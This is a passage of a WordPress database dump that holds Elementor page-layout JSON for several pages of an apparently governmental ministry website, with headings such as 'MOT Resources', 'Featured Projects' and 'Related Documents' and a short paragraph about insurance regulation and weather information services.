rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9366,1635,'_elementor_controls_usage','a:0:{}'),(9367,1635,'_elementor_edit_mode','builder'),(9368,1635,'_elementor_template_type','wp-post'),(9369,1635,'_elementor_version','2.7.5'),(9370,1635,'_wp_page_template','default'),(9371,1635,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"MOT Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aedbee8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa0bcb\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1f2dfb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c79a044\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b726dd5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"bbc7e37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"33d4d35\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9372,1636,'_elementor_controls_usage','a:0:{}'),(9373,1636,'_elementor_edit_mode','builder'),(9374,1636,'_elementor_template_type','wp-post'),(9375,1636,'_elementor_version','2.7.5'),(9376,1636,'_wp_page_template','default'),(9377,1636,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d39894\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry is mandated to ensure strict adherence to insurance standards and regulations in collaboration with insurance agencies operating in the country.<\\/p><p>Through its special project, the MOT provides weather and climate information services to key sectors such as: environment, health, energy, water resources, transport (land, air and sea), agriculture and disaster risk reduction, as well as daily weather forecasts to the general public.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aedbee8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ffa0bcb\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1f2dfb6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c79a044\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b726dd5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b7e060f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bbc7e37\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"33d4d35\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9378,1637,'_elementor_controls_usage','a:0:{}'),(9379,1637,'_elementor_edit_mode','builder'),(9380,1637,'_elementor_template_type','wp-post'),(9381,1637,'_elementor_version','2.7.5'),(9382,1637,'_wp_page_template','default'),(9383,1637,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LAA<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LAA Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6091519\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f9a877\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"91e7e6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bf79dc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c87beee\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8e89038\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"eef1874\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9384,1638,'_elementor_controls_usage','a:0:{}'),(9385,1638,'_elementor_edit_mode','builder'),(9386,1638,'_elementor_template_type','wp-post'),(9387,1638,'_elementor_version','2.7.5'),(9388,1638,'_wp_page_template','default'),(9389,1638,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fee7624\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6091519\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f9a877\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8467a48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"91e7e6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bf79dc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 